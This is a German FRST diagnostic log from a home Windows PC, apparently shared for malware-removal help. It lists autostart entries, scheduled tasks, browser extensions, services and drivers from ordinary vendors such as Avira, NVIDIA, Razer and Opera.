HKLM-x32\...\Run: [Avira System Speedup User Starter] => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [332848 2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4282328 2022-06-07] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [Grammarly] => C:\Users\chris\AppData\Local\Grammarly\DesktopIntegrations\Grammarly.Desktop.exe [946136 2022-06-15] (Grammarly, Inc. -> )
HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Run: [MicrosoftEdgeAutoLaunch_0A1E394B2107F9944ED3CB9C6839BC54] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3601824 2022-07-14] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [Discord] => C:\Users\Lisa\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [com.squirrel.Teams.Teams] => C:\Users\Lisa\AppData\Local\Microsoft\Teams\Update.exe [2454184 2021-05-25] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Run: [Opera GX Browser Assistant] => C:\Users\Lisa\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\RunOnce: [Delete Cached Standalone Update Binary] => C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\Lisa\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" (Keine Datei)
HKU\S-1-5-18\...\Run: [Synapse3] => D:\Synapse3\WPFUI\Framework\Razer Synapse 3 Host\Razer Synapse 3.exe [3524680 2022-02-28] (Razer USA Ltd. -> Razer Inc.)
HKLM\...\Windows x64\Print Processors\Canon TS3100 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPDDR.DLL [482816 2017-03-13] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor TS3100 series: C:\Windows\system32\CNMLMDR.DLL [1302016 2017-03-13] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\103.0.5060.134\Installer\chrmstp.exe [2022-07-20] (Google LLC -> Google LLC)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0DB9E82B-D44C-40B1-9034-BF52926268FF} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1614868383 => C:\Users\chris\AppData\Local\Programs\Opera GX\launcher.exe [2453488 2022-07-13] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\chris\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {18F7131B-A6D1-444B-8F9F-8574666B92FA} - System32\Tasks\Opera GX scheduled Autoupdate 1615284024 => C:\Users\Lisa\AppData\Local\Programs\Opera GX\launcher.exe [42666192 2021-09-28] (Opera Software AS -> Opera Software)
Task: {1F3544CA-9EFA-426B-8B3D-6DD251BE9242} - System32\Tasks\AviraSystemSpeedupVerify => C:\Program Files (x86)\Avira\System Speedup\setup\avira_speedup_setup.exe [32819448 2022-07-01] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {272E4CE1-8F68-4EED-BFDF-6E01CFD5CFD6} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-10] (Google LLC -> Google LLC)
Task: {2F1B69C1-49C8-41BF-B8A8-7B8B33B47BC5} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Update => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {301CE07D-A872-4027-8AAD-8A51F2F0C8A8} - System32\Tasks\Avira_Security_Update => C:\Windows\system32\net.exe [59904 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
Task: {3240C50E-D84D-4B02-9021-A4B8F23E397F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {36B59BFE-92C3-4577-9EB3-A48F37E15056} - System32\Tasks\Opera scheduled assistant Autoupdate 1609849435 => C:\Users\chris\AppData\Local\Programs\Opera\launcher.exe [1893880 2022-07-14] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\chris\AppData\Local\Programs\Opera\assistant" $(Arg0)
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(1): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> FallbackTelemetry
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(2): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> ServiceWatchdog
Task: {3B4067E6-7444-405B-BF78-418B2B6B66CD} - System32\Tasks\Avira_Security_Maintenance => Command(3): C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe -> CrashCollector
Task: {3B74C5CB-076B-4ACD-8A2A-40E25465D4D5} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {3E333973-E2EA-4CE4-B258-1D35A3344F13} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3339120 2021-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {425FFDD3-B209-458B-9A38-8764E722FEA7} - System32\Tasks\Opera scheduled Autoupdate 1609849433 => C:\Users\chris\AppData\Local\Programs\Opera\launcher.exe [1893880 2022-07-14] (Opera Norway AS -> Opera Software)
Task: {4302A2A9-ABB0-4CAB-A43A-120C6F8D8BE2} - System32\Tasks\Avira\System Speedup\Delayed Startup\chris\3 => C:\Users\chris\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
Task: {44B6801D-33B6-4F15-ADA5-F76C4EC8B8F0} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {4FBF287D-3855-45E8-B865-5291BD52CAD0} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [645488 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {514BFB18-1EBB-496F-AF5C-58FD5213D334} - System32\Tasks\Avira\System Speedup\Delayed Startup\chris\2 => C:\Users\chris\AppData\Local\Programs\Opera\assistant\browser_assistant.exe [4110832 2022-07-06] (Opera Norway AS -> Opera Software)
Task: {529E7201-1539-496A-8FE1-D748E8764182} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\2 => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1313408 2017-07-05] (Canon Inc. -> CANON INC.)
Task: {58DC8299-CE2F-40AB-B652-6335B77E0B7E} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {591A781E-5EB7-49FC-ABEF-B22213FC4B88} - System32\Tasks\SS3svc64Run => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\x64\SS3svc64.exe [811520 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
Task: {68E93379-3488-418A-BF23-D339D2B6828B} - System32\Tasks\Avira_Security_Service_SCM_Watchdog => C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.Worker.exe [256800 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {83FCF623-1808-4FBD-AD1E-7356AB826511} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {8CEF75DB-D658-4A21-9C63-AEDA4DBFFC2D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MpCmdRun.exe [993008 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {92B83629-F377-4970-B04B-2291F6FF0EA6} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\3 => C:\ProgramData\SquirrelMachineInstalls\Discord.exe [68822328 2021-03-09] (Discord Inc. -> Discord Inc.)
Task: {9FD325D7-7CAB-4139-BE9E-656333181255} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log
Task: {A4D9313F-C284-4987-80C7-F9D78201EB7F} - System32\Tasks\SS3svc32Run => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3svc32.exe [1234432 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
Task: {A9A13680-DAAC-4128-B91D-DFD221E78568} - System32\Tasks\Avira\System Speedup\TestScheduler => C:\Program Files (x86)\Avira\System Speedup\Avira.SystemSpeedup.Core.Common.Starter.exe [332848 2022-05-09] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
Task: {B2FD02AD-5959-477B-B633-8CDCADA4E7E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-10] (Google LLC -> Google LLC)
Task: {C0A61414-43CC-44A1-A233-01EA19897827} - System32\Tasks\Avira_Security_Systray => C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Systray.Application.exe [1642080 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
Task: {C1C26AF1-D81F-4EFD-A7F0-0916DF2A7093} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1618593618 => C:\Users\Lisa\AppData\Local\Programs\Opera GX\launcher.exe [42666192 2021-09-28] (Opera Software AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Lisa\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {C5A5E07E-6868-4265-B175-EB2639160ED0} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {C93A8B38-65E0-47B2-92AC-F1FB04D75E19} - System32\Tasks\MATLAB R2020b Startup Accelerator => C:\Program Files\MATLAB\R2020b\bin\win64\MATLABStartupAccelerator.exe [53760 2020-07-29] () [Datei ist nicht signiert]
Task: {D741A068-3D6E-4244-BFA4-F2F9088FE746} - System32\Tasks\Opera GX scheduled Autoupdate 1610475719 => C:\Users\chris\AppData\Local\Programs\Opera GX\launcher.exe [2453488 2022-07-13] (Opera Norway AS -> Opera Software)
Task: {DD075DC3-40A4-44A3-8123-188C0334D30F} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\1 => C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe [2154696 2020-12-13] (GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.)
Task: {E7C6AF9B-6449-4ABE-8F51-977D7F9569DB} - System32\Tasks\Avira\System Speedup\Delayed Startup\All users\4 => C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3svc32.exe [1234432 2019-10-30] (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert]
Task: {F6A0EEF0-54C6-4191-B0A3-92DC38612038} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F8C2DD18-065A-47DE-B229-1C94A20EF5AE} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F902C571-8663-425B-B606-A4482E01E1EA} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F94F6760-4107-4CA7-AEFB-57E6BD017C78} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
Task: C:\Windows\Tasks\MATLAB R2020b Startup Accelerator.job => C:\Program Files\MATLAB\R2020b\bin\win64\MATLABStartupAccelerator.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{638dd5ca-05dc-4f0a-8232-6b6c4fda51ff}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{da30106f-af18-4b8c-8cce-01f0c7abbe79}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{e2fef4cc-039a-4676-8f28-84e9c961b5ec}: [NameServer] 141.44.1.1,141.44.1.2

Edge: 
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default [2022-07-21]
Edge Extension: (Outlook) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bjhmmnoficofgoiacjaajpkfndojknpb [2020-12-10]
Edge Extension: (Avira Safe Shopping) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\caiblelclndcckfafdaggpephhgfpoip [2022-07-03]
Edge Extension: (Avira Password Manager) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\emgfgdclgfeldebanedpihppahgngnle [2022-07-15]
Edge Extension: (Word) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hikhggiobiflkdfdgdajcfklmcibbopi [2020-12-10]
Edge Extension: (Excel) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\leffmjdabcgaflkikcefahmlgpodjkdm [2020-12-10]
Edge Extension: (PowerPoint) - C:\Users\chris\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\opfacbhaojodjaojgocnibmklknchehf [2020-12-10]
Edge HKLM-x32\...\Edge\Extension: [caiblelclndcckfafdaggpephhgfpoip]
Edge HKLM-x32\...\Edge\Extension: [emgfgdclgfeldebanedpihppahgngnle]

FireFox:
========
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2019-07-02] (CANON INC.) [Datei ist nicht signiert]

Chrome: 
=======
CHR Profile: C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default [2022-07-20]
CHR Notifications: Default -> hxxps://web.whatsapp.com
CHR Extension: (Slides) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-12-10]
CHR Extension: (Docs) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-12-10]
CHR Extension: (Google Drive) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-12-10]
CHR Extension: (YouTube) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-12-10]
CHR Extension: (Avira Password Manager) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\caljgklbbfbcjjanaijlacgncafpegll [2022-06-19]
CHR Extension: (Watch2Gether) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\cimpffimgeipdhnhjohpbehjkcdpjolg [2022-05-18]
CHR Extension: (Sheets) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-12-10]
CHR Extension: (Stylish - Custom themes for any website) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjnbnpbmkenffdnngjfgmeleoegfcffe [2022-05-18]
CHR Extension: (NordVPN – VPN Proxy for Privacy & Security) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjoaledfpmneenckfbpdfhkmimnjocfa [2022-06-19]
CHR Extension: (Google Docs Offline) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-04-27]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2022-05-18]
CHR Extension: (Excel Online) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\iljnkagajgfdmfnnidjijobijlfjfgnb [2020-12-10]
CHR Extension: (Cashback service LetyShops) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\lphicbbhfmllgmomkkhjfkpbdlncafbn [2022-06-19]
CHR Extension: (Chrome Web Store Payments) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-12-10]
CHR Extension: (De-Fakeator) - C:\Users\chris\AppData\Local\Google\Chrome\User Data\Default\Extensions\pldoiobdcjagdiiphgfmbggpgmhkkaff [2020-12-10]
CHR HKLM\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk]

Opera: 
=======
OPR Profile: C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable [2022-07-21]
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding}
OPR Extension: (Avira Safe Shopping) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\dalelnnofafalcmkmnhdbigbjjkloabo [2021-01-05]
OPR Extension: (Rich Hints Agent) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2021-01-05]
OPR Extension: (Avira Password Manager) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\ngohaaocccbohaffogpbgfpmpgbcgccg [2021-01-05]
OPR Extension: (Free Avira Phantom VPN – Entsperrt Webseiten) - C:\Users\chris\AppData\Roaming\Opera Software\Opera Stable\Extensions\pcgkmkjdikhiodinhloioejnpjgmfigd [2021-01-05]
StartMenuInternet: (HKU\S-1-5-21-292222086-413629167-3624375346-1001) Opera GXStable - "C:\Users\chris\AppData\Local\Programs\Opera GX\Launcher.exe"
StartMenuInternet: (HKU\S-1-5-21-292222086-413629167-3624375346-1006) Opera GXStable - "C:\Users\Lisa\AppData\Local\Programs\Opera GX\Launcher.exe"

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AsusUpdateCheck; C:\Windows\System32\AsusUpdateCheck.exe [768408 2022-07-20] (ASUSTeK Computer Inc. -> )
R2 AviraOptimizerHost; C:\Program Files (x86)\Avira\Optimizer Host\Avira.OptimizerHost.exe [3000608 2022-03-25] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
R2 AviraPhantomVPN; C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe [386864 2022-03-30] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
R2 AviraSecurity; C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.exe [264400 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
S2 AviraSecurityUpdater; C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Common.Updater.exe [282464 2022-07-13] (Avira Operations GmbH -> Avira Operations GmbH & Co. KG)
R2 EndpointProtectionService; C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe [8481656 2022-07-14] (Avira Operations GmbH -> Avira Operations GmbH)
S3 EndpointProtectionService2; C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe [8481656 2022-07-14] (Avira Operations GmbH -> Avira Operations GmbH)
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [342456 2020-12-08] (FUTUREMARK INC -> Futuremark)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [445432 2021-04-19] (Canon Inc. -> )
R2 nordvpn-service; C:\Program Files\NordVPN\nordvpn-service.exe [280440 2021-06-05] (nordvpn s.a. -> TEFINCOM S.A.)
S3 OVRLibraryService; C:\Program Files\Oculus\Support\oculus-librarian\OVRLibraryService.exe [148064 2022-07-14] (Oculus VR, LLC -> Facebook Technologies, LLC)
R2 OVRService; C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe [514656 2022-07-14] (Oculus VR, LLC -> Facebook Technologies, LLC)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2022-03-17] (Even Balance, Inc. -> )
R2 Razer Chroma SDK Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe [2028568 2022-02-21] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma SDK Service; C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe [461336 2021-11-30] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Chroma Stream Server; C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe [1349688 2022-02-21] (Razer USA Ltd. -> Razer Inc.)
R2 Razer Game Manager Service; C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe [254224 2021-11-16] (Razer USA Ltd. -> Razer Inc)
R2 Razer Synapse Service; D:\Synapse3\Service\Razer Synapse Service.exe [298056 2022-02-28] (Razer USA Ltd. -> Razer Inc.)
R2 RzActionSvc; C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe [533824 2022-02-18] (Razer USA Ltd. -> Razer Inc.)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\NisSrv.exe [3120992 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MsMpEng.exe [133544 2022-07-14] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 BdSentry; C:\Windows\System32\DRIVERS\BdSentry.sys [230520 2022-06-21] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus2.sys [160376 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R2 NDivert; C:\Program Files\NordVPN\Drivers\NDivert.sys [128856 2021-06-09] (nordvpn s.a. -> Nordvpn S.A.)
R1 netprotection_network_filter; C:\Windows\System32\drivers\netprotection_network_filter.sys [100128 2022-06-15] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 netprotection_network_filter2; C:\Windows\System32\drivers\netprotection_network_filter2.sys [100376 2022-06-15] (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG)
S3 nlwt; C:\Windows\system32\DRIVERS\nlwt.sys [39360 2020-12-10] (TEFINCOM S.A. -> WireGuard LLC)
R1 nordlwf; C:\Windows\system32\DRIVERS\nordlwf.sys [38608 2020-10-14] (TEFINCOM S.A. -> TEFINCOM S.A.)
R3 oculusvad_oculusvad; C:\Windows\System32\drivers\oculusvad.sys [75280 2022-03-02] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
R3 Oculus_ViGEmBus; C:\Windows\System32\drivers\Oculus_ViGEmBus.sys [32856 2022-03-02] (Oculus VR, LLC -> Facebook Inc.)
S0 rtp_elam; C:\Windows\System32\DRIVERS\rtp_elam.sys [24024 2022-06-30] (Microsoft Windows Early Launch Anti-Malware Publisher -> Avira Operations GmbH)
R2 rtp_filesystem_filter; C:\Windows\System32\DRIVERS\rtp_filesystem_filter.sys [202584 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R1 rtp_process_monitor; C:\Windows\system32\DRIVERS\rtp_process_monitor.sys [193304 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R1 rtp_traverse; C:\Windows\system32\DRIVERS\rtp_traverse.sys [47560 2022-06-30] (Avira Operations GmbH -> Avira Operations GmbH)
R3 RzCommon; C:\Windows\System32\drivers\RzCommon.sys [54632 2021-03-30] (Razer USA Ltd. -> Razer Inc)
R3 RzDev_0065; C:\Windows\System32\drivers\RzDev_0065.sys [54152 2020-08-24] (Razer USA Ltd. -> Razer Inc)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [167280 2020-11-11] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 tap0901; C:\Windows\System32\drivers\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R3 tapnordvpn; C:\Windows\System32\drivers\tapnordvpn.sys [44896 2020-06-09] (TEFINCOM S.A. -> The OpenVPN Project)
R1 ViGEmBus; C:\Windows\System32\drivers\ViGEmBus.sys [165744 2020-12-14] (Microsoft Windows Hardware Compatibility Publisher -> Nefarius Software Solutions e.U.)
R3 vmulti; C:\Windows\System32\drivers\vmulti.sys [19600 2020-12-13] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [49576 2022-07-14] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [452856 2022-07-14] (Microsoft Windows -> Microsoft Corporation)
